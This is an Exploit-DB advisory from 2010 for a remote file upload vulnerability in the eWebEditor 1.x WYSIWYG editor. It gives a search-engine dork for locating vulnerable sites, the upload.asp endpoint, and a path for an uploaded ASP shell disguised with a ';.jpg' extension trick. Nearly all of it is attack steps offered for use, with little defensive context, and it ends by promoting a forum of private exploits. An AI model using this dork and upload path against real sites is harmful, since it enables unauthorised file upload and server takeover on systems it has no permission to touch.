eWebEditor 1.x - WYSIWYG Remote File Upload

2010-05-22T00:00:00
ID EDB-ID:12699
Type exploitdb
Reporter Ma3sTr0-Dz
Modified 2010-05-22T00:00:00

Description

eWebEditor v1.x (WYSIWYG) Remote File Upload. Webapps exploit for php platform

                                        
                                            =============================================================================
# Tilte: eWebEditor v1.x (WYSIWYG) Remote File Upload .
=============================================================================

#
Date....................: [22-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [eWebEditor v1.x (WYSIWYG) Remote File Upload .]
# Impact..................: [Remote]
# Site Software ..........:[http://www.ewebeditor.net/]
# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de] 
# Vulnerability: Remote File Upload .


#
Part ExplOit & Bug Codes :

------
Dork :
------
allinurl:ewebeditor/asp/

Exploit :
---------

http://site.com/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn

http://site.com/uploads/asp/sec4ever.asp;.jpg
-----------------------
Don't Forget : Www.Sec4ever.com/home /// Ur Secure Mind /